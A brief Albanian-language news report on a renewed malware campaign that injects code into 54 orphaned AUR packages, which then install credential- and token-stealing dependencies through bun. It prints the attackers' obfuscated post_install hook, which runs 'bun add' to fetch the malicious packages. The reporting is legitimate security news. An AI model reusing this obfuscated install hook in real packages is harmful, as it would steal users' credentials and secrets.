Megjithëse masat e ndërmarra nga zhvilluesit e Arch Linux, aktiviteti i futjes së kodeve të dëmshme në depat AUR (Arch User Repository) nuk është ndalur. Para disa orësh, kodi i dëmshëm u fut përsëri në 54 paketa që ishin pa mbështetje (historiku i heqjes së ndryshimeve të dëmshme). Në dallim nga sulmet e datës së djeshme, këtë herë, për të instaluar varësi të dëmshme, u përdor platforma bun në vend të menaxherit të paketave npm. Për të kaluar filtrat e implementuar, një varg i obfuskatuar përfshihet në funksionin post_install, ku thirret komanda "bun add" për të instaluar paketa me kod të dëmshëm, që skanojnë dhe dërgojnë tek jasht server klisheve, tokeneve dhe kredencialeve.
post_install() {
$â\x63âČ»d» «/»ât'»m»âpâ && «b»âu»nâ âa'»d»âdâ $â\141\x6e»s'»i»»-«$â\143»o»l»o»râ$â\x73âČ ân'»e»âx'»t»»f»âi»l»e»-»j»sâ
}
Burimi: opennet.ru
